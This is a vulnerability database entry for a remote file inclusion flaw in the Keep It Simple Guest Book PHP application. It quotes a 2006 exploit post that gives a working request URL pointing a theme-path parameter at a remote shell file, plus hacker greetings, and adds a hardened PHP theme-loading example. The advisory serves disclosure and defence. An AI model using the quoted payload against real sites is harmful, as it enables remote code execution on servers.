Keep It Simple Guest Book Multiple PHP Remote File Inclusion Vulnerabilities

Vulnerability ID: 1111827    Vulnerability type: Unknown
Published: 2006-12-22    Updated: 2006-12-26
CVE ID: CVE-2006-6763    CNNVD-ID: CNNVD-200612-526
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2979
https://www.securityfocus.com/bid/87097
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-526
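|Vulnerability details
KeepItSimpleGuestBook (KISGB) contains multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code by supplying a URL in (1) the path_to_themes parameter in (a) authenticate.php and in the default_path_for_themes parameter in (b) admin.php and (c) upconfig.php.
|Exploit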
******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files :								    *
+authenticate.php?                                                          *
**********************************************************************************
+code  :                                                                         *
+                                                                                *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   YOUR FEARS ARE ONLY YOUR NIGHTMARES..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        To Fear Is Not to Escape.			     *
*******************                                                                          *
**********************************************************************************************


//////////////////////////////////////////////////////////////////////////////////////////////


Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
	// Vulnerable here.
}

So this is only vulnerable for CGI PHP versions.

/str0ke

# milw0rm.com [2006-12-22]
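
A hardened counterpart to the require() call quoted in the advisory above, as an added example that is not KISGB code or part of the original advisory: the theme is resolved by name against a fixed server-side directory instead of a path the request can set. The function name resolve_theme(), the temporary directory and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not KISGB code. resolve_theme() is a hypothetical helper.

/**
 * Map a requested theme name to a file inside $baseDir, or return null.
 * $baseDir must come from server-side configuration, never from the request.
 */
function resolve_theme(string $requested, string $baseDir): ?string
{
    // Theme names are plain identifiers: no slashes, dots, colons or NUL
    // bytes, so URLs and relative paths fail here before touching the disk.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Containment check: the resolved file must still live under the base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary themes directory holding one theme file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'kisgb_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/default.php', "<?php // constructed sample theme\n");

// Constructed inputs: one valid name, one URL-shaped value, one relative
// path, one unknown name.
$samples = ['default', 'http://example.invalid/x.txt?', '../outside', 'missing'];
foreach ($samples as $s) {
    $p = resolve_theme($s, $dir);
    printf("%-32s => %s\n", $s, $p === null ? 'rejected' : 'require ' . basename($p));
}

unlink($dir . '/default.php');
rmdir($dir);
```

Only the first sample resolves to a file; the other three are rejected. Setting allow_url_include to Off in php.ini additionally makes require() refuse http:// paths, but the name check is still needed for local paths.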
|Affected products
Keep It Simple Guest Book Keep It Simple Guest Book 5.0
|References

Source: BUGTRAQ
Name: 20061222 Re: Multiple Remote Vulnerabilities in KISGB
Link: http://www.securityfocus.com/archive/1/archive/1/455198/100/0/threaded
Source: MISC
Link: http://www.security.nnov.ru/Pdocument470.html